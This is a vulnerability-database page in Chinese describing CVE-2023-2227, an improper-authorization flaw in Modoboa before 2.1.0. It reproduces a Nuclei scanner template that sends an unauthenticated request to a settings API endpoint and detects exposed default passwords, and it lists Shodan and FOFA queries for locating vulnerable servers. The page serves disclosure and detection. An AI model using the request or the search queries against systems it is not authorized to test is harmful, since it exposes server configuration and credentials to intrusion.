CVE-2023-2227: Modoboa < 2.1.0 - Improper Authorization

日期: 2025-08-01 | 影响软件: Modoboa | POC: 已公开

漏洞描述

Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.

PoC代码[已公开]

id: CVE-2023-2227

info:
  name: Modoboa < 2.1.0 - Improper Authorization
  author: ritikchaddha,princechaddha
  severity: critical
  description: |
    Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.
  reference:
    - https://huntr.com/bounties/351f9055-2008-4af0-b820-01ff66678bf3
    - https://github.com/modoboa/modoboa/commit/7bcd3f6eb264d4e3e01071c97c2bac51cdd6fe97
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2227
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-2227
    cwe-id: CWE-285
    epss-score: 0.90923
    epss-percentile: 0.99619
    cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: modoboa
    product: modoboa
    shodan-query:
      - "http.favicon.hash:1949005079"
      - http.html:"modoboa"
    fofa-query:
      - "body=\"Modoboa\""
      - body="modoboa"
      - icon_hash=1949005079
  tags: cve,cve2023,modoboa,exposure,disclosure

http:
  - raw:
      - |
        GET /api/v2/parameters/core/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: 7h3h4ckv157

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'label":'
          - 'default_password":'
          - 'authentication_type":"local'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a0046304402200e996e0ae1adc8f681f184ba2c3ab3e5ed2d9e6a554c39b9bcd49c910996196402204504d44d5f6409345d20f5b2486be015823fe53db8f87d251a580f231f5d1bf5:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-2227.yaml

相关漏洞推荐